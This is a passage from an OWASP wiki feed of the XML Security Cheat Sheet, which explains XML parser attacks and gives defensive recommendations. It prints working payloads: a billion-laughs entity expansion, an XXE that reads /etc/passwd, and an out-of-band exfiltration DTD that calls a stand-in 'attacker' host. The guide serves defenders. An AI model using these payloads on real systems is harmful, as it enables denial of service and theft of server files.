 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To detect this type of behavior automatically, you must limit the number of expansions to be made, or disable the use of inline DTD schemas altogether in your XML parsing objects.  SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,”  but when this type of vulnerability was detected, certain implementations did not comply with this rule. &lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE roottag [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;send;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224416</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224416"/>
				<updated>2016-12-21T18:50:54Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
